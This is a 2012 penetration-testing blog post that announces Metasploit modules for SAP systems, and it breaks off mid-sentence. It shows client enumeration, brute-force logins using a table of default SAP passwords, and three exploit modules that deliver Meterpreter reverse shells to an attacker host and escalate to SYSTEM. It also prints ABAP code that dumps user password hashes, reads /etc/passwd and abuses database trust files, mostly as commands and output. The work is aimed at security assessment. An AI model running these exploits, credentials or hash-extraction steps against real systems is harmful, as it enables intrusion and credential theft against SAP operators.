MWR SAP Metasploit Modules
on 27 April, 2012
We have recently developed several Metasploit auxiliary and exploitation modules to assist consultants in assessing SAP systems, and Dave has also delivered a presentation “SAP Slapping (a pentesters guide)” at CRESTCon and BSides London where some of these modules were demonstrated.
We plan to submit these modules to the Metasploit Framework; however until this process is complete the modules will be available here. We have not yet finished all of the modules that we plan to write, so stay tuned for future updates.
Some of the modules here are based on, or are ports of the plugins available in the Onapsis Bizploit Opensource ERP Penetration Testing framework. Others are not. Bizploit has been an essential tool for security consultants assessing SAP systems since its release. However the framework has not been updated since then. Bizploit was our inspiration for writing the Metasploit modules.
The intention behind writing the Metasploit modules, as opposed to contributing back to the Bizploit framework, was to encourage contributions from the community. Bizploit is written in Python and C and has not seen any community contributions; this is unfortunate. We’re hoping that the community finds it easier to contribute to the Metasploit framework and helps to build an even more impressive free and open source SAP assessment tool set leveraging the capabilities of the Metasploit framework.
Update: all the modules are now in the MSF trunk and the Q repository.
Mariano Nuñez (the author of the Bizploit framework) helped in our efforts in producing the Metasploit modules and was happy to share his knowledge and experience – a very cool guy. We’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP.
The majority of the modules rely on the SAP NW RFC SDK and require the Ruby wrapper ‘nwrfc’ by Martin Ceronio.
Unfortunately the NW RFC SDK is available only to those who have access to the SAP Service Marketplace (SMP). In order to get access to the SAP Marketplace you need an S-ID, password and customer number. Alternatively the required library files (such as libsapnwrfc) can be extracted from a SAP system (such as the freely available test drive systems). These third party requirements are one of the reasons that the submission to the Metasploit Framework is proving problematic.
The modules are extensively related at present to exploiting issues with Remote Function Calls (RFC). RFC is the standard SAP interface for communication between SAP systems. SAP systems can communicate with other SAP systems, or non-SAP system using RFC and/or by calling functions directly in a system (using an Advanced Business Application Programming (ABAP) interface or RFC API). RFC’s are basically independent ABAP modules that can be called locally or remotely.
RFC communication is done through the Gateway Service (each instance of a SAP system has a gateway). The gateway enables communication between work processes and external programs, as well as communication between work processes from different instances or SAP Systems. There are more than 33,000 RFC-enabled function modules available in a standard SAP ECC 6.0 system.
We have completed seven auxiliary modules and three exploit modules (more will follow soon). Details of these are presented below.
sap_rfc_client_enum auxiliary module
In SAP land, clients are things you connect to using a GUI. The range is 000 – 999, with the default clients being 000, 001, 066. If you try and connect to a client via RFC that does not exist, SAP will error: “Client is not available”. Therefore it is possible to brute force the whole range to discover available ones.
The sap_rfc_client_enum module attempts to brute force the available SAP clients via the RFC interface.
./msfcli auxiliary/scanner/sap/sap_rfc_client_enum RHOSTS=172.16.252.135 RPORT=3342 E
[*] Brute forcing clients 000,001,066
[+] 172.16.252.135:3342 [SAP] client found - 000
[+] 172.16.252.135:3342 [SAP] client found - 001
[+] 172.16.252.135:3342 [SAP] client found - 066
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sap_rfc_brute_login auxiliary module
Typically the Default account lockout threshold applied to SAP accounts is 5. However, accounts in most systems unlock at 00:01, so if your going to attempt a brute force attack, do it before 00:00 and after the user has finished for the day.
If you can communicate with the SAP Management Console via its SOAP interface you can extract the exact configuration (unauthenticated) by making use of the Metasploit module ‘sap_mgmt_con_getprocessparameter’ written by Chris John Riley. For more details on how this is possible see here.
msf > use auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
msf auxiliary(sap_mgmt_con_getprocessparameter) > set RHOST 172.16.252.135
RHOST => 172.16.252.135
msf auxiliary(sap_mgmt_con_getprocessparameter) > set MATCH login/fail
MATCH => login/fail
msf auxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP Management Console SOAP Interface on 172.16.252.135:50013
[*] [SAP] Regex match selected, skipping loot storage
[*] 172.16.252.135:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail)
[*] [SAP] Process Parameter Results for (?i-mx:login\/fail)
[SAP] Process Parameters
========================
Name Description Value
---- ----------- -----
login/failed_user_auto_unlock Enable automatic unlock off locked user at midnight 0
login/fails_to_session_end Number of invalid login attempts until session end 3
login/fails_to_user_lock Number of invalid login attempts until user lock 5
[*] Scanned 1 of 2 hosts (050% complete)
[*] [SAP] Connecting to SAP Management Console SOAP Interface on 10.0.0.192:50013
[*] [SAP] Regex match selected, skipping loot storage
[*] 10.0.0.192:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
A list of default SAP system username and password combinations are contained within the table below.
| User | Description | Clients | Password |
| SAP* | Super user | 000, 001, 066 & new clients | 06071992 & PASS |
| DDIC | ABAP Dictionary super user | 000, 001 | 19920706 |
| TMSADM | Transport Management System user | 000 | PASSWORD |
| EARLYWATCH | EarlyWatch service user | 066 | SUPPORT |
| SAPCPIC | Communications user | 000, 001 | ADMIN |
The sap_rfc_brute_login module attempts to brute force the username and password combination via an exposed RFC interface.
./msfcli auxiliary/scanner/sap/sap_rfc_brute_login BLANK_PASSWORDS=false USER_AS_PASS=false RHOSTS=172.16.252.135 RPORT=3342 E
[*] Brute forcing clients 000,001,066
[SAP] Credentials
=================
host port client user pass status
---- ---- ------ ---- ---- ------
172.16.252.135 3342 000 SAP* 06071992 locked
172.16.252.135 3342 000 DDIC 19920706
172.16.252.135 3342 001 SAP* 06071992
172.16.252.135 3342 001 DDIC 19920706
172.16.252.135 3342 066 SAP* 06071992 locked
172.16.252.135 3342 066 EARLYWATCH SUPPORT
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sap_rfc_sxpg_call_system exploit module
The RFC SXPG_CALL_SYSTEM can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.
The sap_rfc_sxpg_call_system module exploits an arbitrary command execution vulnerability in the SXPG_CALL_SYSTEM RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.
msf > use exploit/windows/sap/sap_rfc_sxpg_call_system
msf exploit(sap_rfc_sxpg_call_system) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf exploit(sap_rfc_sxpg_call_system) > set RPORT 3300
RPORT => 3300
msf exploit(sap_rfc_sxpg_call_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(sap_rfc_sxpg_call_system) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf exploit(sap_rfc_sxpg_call_system) > exploit
[*] Started reverse handler on 10.0.1.161:4444
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_CALL_SYSTEM RFC. We're limited to approx. 256 chars,
be patient!
[*] Command Stager progress - 2.19% done (249/11366 bytes)
[*] Command Stager progress - 4.38% done (498/11366 bytes)
[*] Command Stager progress - 6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress - 95.94% done (10904/11366 bytes)
[*] Command Stager progress - 98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 10 opened (10.0.1.161:4444 -> 10.0.1.150:55364) at Wed Mar 21 10:28:32 +0000 2012
meterpreter > getuid
Server username: GATEWAY\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7600).
Computer : GATEWAY
Architecture : x64
Meterpreter : x64/win64
sap_rfc_sxpg_command_exec exploit module
The RFC SXPG_COMMAND_EXEC can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.
The sap_rfc_sxpg_command_exec module exploits arbitrary command execution vulnerability in the SXPG_COMMAND_EXEC RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.
msf > use exploit/windows/sap/sap_rfc_sxpg_command_exec
msf exploit(sap_rfc_sxpg_command_exec) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf exploit(sap_rfc_sxpg_command_exec) > set RPORT 3300
RPORT => 3300
msf exploit(sap_rfc_sxpg_command_exec) > set CLIENT 001
CLIENT => 001
msf exploit(sap_rfc_sxpg_command_exec) > set USER SAP*
USER => SAP*
msf exploit(sap_rfc_sxpg_command_exec) > set PASS 06071992
PASS => 06071992
msf exploit(sap_rfc_sxpg_command_exec) > set CMD LIST_DB2DUMP
CMD => LIST_DB2DUMP
msf exploit(sap_rfc_sxpg_command_exec) > set OS 3
OS => 3
msf exploit(sap_rfc_sxpg_command_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(sap_rfc_sxpg_command_exec) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf exploit(sap_rfc_sxpg_command_exec) > set LPORT 4444
LPORT => 4444
msf exploit(sap_rfc_sxpg_command_exec) > exploit
[*] Started reverse handler on 10.0.1.161:4444
[*] Using custom payload size of 250
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_COMMAND_EXECUTE RFC. We're limited to approx. 256 chars,
be patient!
[*] Command Stager progress - 2.19% done (249/11366 bytes)
[*] Command Stager progress - 4.38% done (498/11366 bytes)
[*] Command Stager progress - 6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress - 95.94% done (10904/11366 bytes)
[*] Command Stager progress - 98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 2 opened (10.0.1.161:4444 -> 10.0.1.150:58640) at Wed Mar 21 13:40:41 +0000 2012
meterpreter > getuid
Server username: GATEWAY\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7600).
Computer : GATEWAY
Architecture : x64
Meterpreter : x64/win64
sap_rfc_system exploit module
The RFC_ABAP_INSTALL_AND_RUN RFC takes ABAP source lines and executes them. It is common for it to be disabled and/or access revoked in PROD environments; it is also deprecated. That doesn’t mean you won’t find it enabled or that control of DEV or QAS environments doesn’t offer the opportunity to gain access to the PROD environment!
The sap_rfc_system module exploits an arbitrary command execution vulnerability in the RFC_ABAP_INSTALL_AND_RUN RFC to deliver a custom Metasploit payload.
msf > use exploit/windows/sap/sap_rfc_system
msf exploit(sap_rfc_system) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf exploit(sap_rfc_system) > set RPORT 3300
RPORT => 3300
msf exploit(sap_rfc_system) > set CLIENT 001
CLIENT => 001
msf exploit(sap_rfc_system) > set USER SAP*
USER => SAP*
msf exploit(sap_rfc_system) > set PASS 06071992
PASS => 06071992
msf exploit(sap_rfc_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(sap_rfc_system) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf exploit(sap_rfc_system) > set LPORT 3344
LPORT => 3344
msf exploit(sap_rfc_system) > exploit
[*] Started reverse handler on 10.0.1.161:3344
[*] Using custom payload size of 250
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload via RFC_ABAP_INSTALL_AND_RUN RFC. We're limited to approx. 256 chars, be patient!
[*] Command Stager progress - 2.19% done (249/11366 bytes)
[*] Command Stager progress - 4.38% done (498/11366 bytes)
[*] Command Stager progress - 6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress - 95.94% done (10904/11366 bytes)
[*] Command Stager progress - 98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 1 opened (10.0.1.161:3344 -> 10.0.1.150:64998) at Thu Mar 22 11:31:20 +0000 2012
meterpreter > getuid
Server username: GATEWAY\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7600).
Computer : GATEWAY
Architecture : x64
Meterpreter : x64/win64
sap_rfc_usr02 auxiliary module
SAP has implemented a number of different password hashing mechanisms. Hashes are stored in table USR02 and USH02 (BCODE & PASSCODE). This module makes use of the RFC_ABAP_INSTALL_AND_RUN RFC to extract SAP user hashes from the USR02 table. The ABAP code in the module executes native SQL to extract the hashes of all users across all clients. These can be cracked by john-the-ripper. The ABAP source is below.
REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
DATA: MANDT(3), BNAME(12), BCODE TYPE XUCODE, PASSC TYPE PWD_SHA1.
EXEC SQL PERFORMING loop_output.
SELECT MANDT, BNAME, BCODE, PASSCODE INTO :MANDT, :BNAME, :BCODE, :PASSC
FROM USR02
ENDEXEC.
FORM loop_output.
WRITE: / MANDT, BNAME, BCODE, PASSC.
ENDFORM.
An example run is shown below.
./msfcli auxiliary/scanner/sap/sap_rfc_usr02 RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[SAP] Users and hashes
======================
MANDT Username BCODE PASSCODE
----- -------- ----- --------
000 DDIC 61D26428640DBAB5 905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
000 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480
000 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000
000 TMSADM 942B9DC0F2394D85 C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF
001 DDIC 61D26428640DBAB5 905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
001 ADS_AGENT 8C32369322B732F6 FE0DD787EE7EBCBF4728BDC1A865A6F15B064611
001 ADSUSER 7FE24F5321515E7F CD83AD9E92B4E37E2255FEA11AC82234BA825FBD
001 SAPJSF 7D6762BFB7504CA4 93738A70AA83C6DAA6CD0B3B1853986333A29192
001 J2EE_ADMIN 6C1541BC997289D1 149E781A80383CC59AB04E88B51832819403364F
001 J2EE_GUEST 0000000000000000 0000000000000000000000000000000000000000
001 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480
001 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000
001 DEVELOPER C4C768AEB4A99EF5 4BD353A8F1D8B453D58910CC87D24B0C1C9A9011
066 EARLYWATCH BD5E494D3ECBF5E2 0000000000000000000000000000000000000000
066 SAP* 29B60B2614510C1D 789C6E939E7BD99A554D79ABC214910A502EE407
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sap_rfc_read_table auxiliary module
This module makes use of the RFC_READ_TABLE function to extract arbitrary data from SAP tables.
WARNING: RFC_READ_TABLE truncates RAW data so is not capable of reading BCODE/PASSCODE fields from the USR02/USH02 tables as only the first half of the hash will be returned. RFC_READ_TABLE miscalculates the length of raw fields e.g. 8 bytes are interpreted as 8 chars when in fact it should be 16 hex chars. There is nothing you can do about it.
The text below is taken from SAP Note 382318.
'' The scope of function module RFC_READ_TABLE is very restricted. E.g., due to the fixed maximum row size only smaller tables can be accessed. There are several data types that cannot be handled, and also there are doubts regarding the Unicode compatibility of the function module. However, all this is quite immaterial, because the function is not meant to be publicly used anyway. It was only created to be used as a sample in various training courses, and is clearly flagged as “not released for customer”.
Solution – Do not use function module RFC_READ_TABLE in the first place!
./msfcli auxiliary/scanner/sap/sap_rfc_read_table RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
TABLE=USR02 FIELDS="MANDT,BNAME" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 001|ADSUSER
[+] 001|ADS_AGENT
[+] 001|DDIC
[+] 001|DEVELOPER
[+] 001|J2EE_ADMIN
[+] 001|J2EE_GUEST
[+] 001|SAP*
[+] 001|SAPCPIC
[+] 001|SAPJSF
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sap_rfc_system auxiliary module
This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary OS commands via the ABAP SYSTEM call. The ABAP source is below.
REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
TYPES lt_line(255) TYPE c.
DATA lv_cmd(42) TYPE c.
DATA lt_result TYPE STANDARD TABLE OF lt_line WITH HEADER LINE.
lv_cmd = '#{command}'.
CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd
ID 'TAB' FIELD lt_result-*sys*.
LOOP AT lt_result.
WRITE : / lt_result.
ENDLOOP.
An example run is shown below.
./msfcli auxiliary/scanner/sap/sap_rfc_system RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.135:3342 [SAP] Executed id
[SAP] Command Exec
==================
Output
------
uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
sap_rfc_sxpg_command_exec auxiliary module
This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69. Transaction SM69 is used to maintain external OS commands.
1.1. File System
A number of OS commands are preconfigured on SAP installs within transaction SM69. Below the module is executing the LIST_DB2DUMP (ls -la) command on a UNIX system to view the attributes of the /etc/passwd file.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
CMD=LIST_DB2DUMP OS=2 PARAM="/etc/passwd" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP /etc/passwd
[SAP] Command Exec
==================
Output
------
-rw-r--r-- 1 root root 1669 2011-11-02 12:58 /etc/passwd
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
A number of OS commands are preconfigured on SAP installs within SM69. Below the module is executing the CAT command on a UNIX system to view the contents of the /etc/passwd file.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
CMD=CAT OS=2 PARAM="/etc/passwd" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: CAT /etc/passwd
[SAP] Command Exec
==================
Output
------
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dnsmasq:x:103:65534:dnsmasq:/var/lib/empty:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:109:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:105:107:User for haldaemon:/var/run/hald:/bin/false
lighttpd:x:101:102:user for lighttpd:/var/lib/lighttpd:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
npladm:x:1001:100:npladm:/home/npladm:/bin/csh
ntp:x:74:105:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:106:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:106:108:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
root:x:0:0:root:/root:/bin/bash
sapadm:x:1004:100:sapadm:/home/sapadm:/bin/csh
sdb:x:1002:100:sdb:/home/sdb:/bin/csh
sqdnpl:x:1003:100:sqdnpl:/home/sqdnpl:/bin/csh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:108:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
testdrive:x:1000:100::/home/testdrive:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
yastws:x:107:110:User for YaST-Webservice:/var/lib/yastws:/bin/false
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1.2. Database Pwnage
MAX DB has a similar mechanism to Oracle REMOTE_OS_AUTHENT called XUSER. If the OS user has a file named .XUSER.62 in their home directory, they can connect to the database by specifying the defined user key alone (no need to enter a username and/or password!).
Below the module is being used to execute the XUSER command to view the contents of the .XUSER.62 file.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
CMD=XUSER OS=1 PARAM="list" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: XUSER list
[SAP] Command Exec
==================
Output
------
--------------
--------------
--------------
--------------
-----------------------------------------------------------------
-----------------------------------------------------------------
-----------------------------------------------------------------
-----------------------------------------------------------------
Cachelimit :-1
Cachelimit :-1
Cachelimit :-1
Cachelimit :-1
Charset :<unspecified>
Charset :<unspecified>
Charset :<unspecified>
Charset :<unspecified>
Dbname :NPL
Dbname :NPL
Dbname :NPL
Dbname :NPL
Isolation :-1
Isolation :-1
Isolation :-1
Isolation :0
Key :DEFAULT
Key :c
Key :c_J2EE
Key :w
Long Password :?????????
Long Password :?????????
Long Password :?????????
Long Password :?????????
Nodename :nplhost
Nodename :nplhost
Nodename :nplhost
Nodename :nplhost
Password :?????????
Password :?????????
Password :?????????
Password :?????????
PasswordUCS2 :?????????
PasswordUCS2 :?????????
PasswordUCS2 :?????????
PasswordUCS2 :?????????
Sqlmode :INTERNAL
Sqlmode :INTERNAL
Sqlmode :INTERNAL
Sqlmode :SAPR3
Timeout :-1
Timeout :-1
Timeout :-1
Timeout :0
Username :CONTROL
Username :CONTROL
Username :SAPNPL
Username :SUPERDBA
UsernameUCS2 :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . .
UsernameUCS2 :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . .
UsernameUCS2 :S.A.P.N.P.L. . . . . . . . . . . . . . . . . . . . . . . . . . .
UsernameUCS2 :S.U.P.E.R.D.B.A. . . . . . . . . . . . . . . . . . . . . . . . .
XUSER Entry 1
XUSER Entry 2
XUSER Entry 3
XUSER Entry 4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Below the module is being used to execute the DBMCLI command to connect to the database with parameters extracted from the .XUSER.62 file. No credentials are provided as the OS user has access to the .XUSER.62 file and is a ‘trusted’ user.
The SQL command executed extracts the hashes for all users across all clients. These can be cracked by john-the-ripper.
./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
CMD=DBMCLI OS=1 PARAM="-d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02" E
[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: DBMCLI -d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02
[SAP] Command Exec
==================
Output
------
000;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
000;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480'
000;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000'
000;TMSADM;x'942B9DC0F2394D85';x'C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF'
001;ADSUSER;x'7FE24F5321515E7F';x'CD83AD9E92B4E37E2255FEA11AC82234BA825FBD'
001;ADS_AGENT;x'8C32369322B732F6';x'FE0DD787EE7EBCBF4728BDC1A865A6F15B064611'
001;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
001;DEVELOPER;x'C4C768AEB4A99EF5';x'4BD353A8F1D8B453D58910CC87D24B0C1C9A9011'
001;J2EE_ADMIN;x'6C1541BC997289D1';x'149E781A80383CC59AB04E88B51832819403364F'
001;J2EE_GUEST;x'0000000000000000';x'0000000000000000000000000000000000000000'
001;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480'
001;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000'
001;SAPJSF;x'7D6762BFB7504CA4';x'93738A70AA83C6DAA6CD0B3B1853986333A29192'
066;EARLYWATCH;x'BD5E494D3ECBF5E2';x'0000000000000000000000000000000000000000'
066;SAP*;x'29B60B2614510C1D';x'789C6E939E7BD99A554D79ABC214910A502EE407'
END
OK
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1.3. Arbitrary Command Execution
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands. Notice the command